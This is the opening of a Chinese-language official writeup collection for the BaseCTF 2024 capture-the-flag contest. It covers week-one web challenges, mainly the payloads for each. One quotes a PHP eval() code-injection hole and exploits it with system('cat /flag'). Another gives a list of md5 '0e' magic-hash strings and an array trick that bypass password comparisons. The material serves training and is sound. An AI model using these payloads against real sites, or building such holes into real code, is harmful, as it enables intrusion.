Base0x!?0e用户1757
BaseCTF 2024 官方 Writeup 合集
输入“/”快速插入内容
BaseCTF 2024 官方 Writeup 合集
BaseCTF 2024 官方 Writeup 合集
2月26日修改
7257
18446
9
4
视频讲解
•
Week1
◦
◦
•
Week2
◦
Web, Reverse, Misc 讲解: https://www.bilibili.com/video/BV16DHjebEzU https://www.bilibili.com/video/BV12QfiB8EUB
•
Week3
Web
week1
喵喵喵´•ﻌ•`
代码块
<?php
highlight_file(__FILE__);
error_reporting(0);
$a = $_GET['DT'];
eval($a);
?>
通过查看代码, 我们可以发现他读取了 GET 参数中的 DT
我们可以利用 system 函数执行 Shell 命令, 也可用使用 echo file_get_contents('/flag'); 来输出flag 内容
下面给出 system 的示例
DT=system('cat /flag');
MD5绕过欸
经典的md5绕过,弱比较可以使用数组或是以下md5后开头为0e的字符串任意两个来绕过:
代码块
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
0e215962017
强比较直接用数组绕过就行
payload:
代码块
/?name=QNKCDZO&name2[]=1
password=240610708&password2[]=2
HTTP 是什么呀
此题考察了我们对 HTTP 协议的理解,大多数内容已经写在了提示中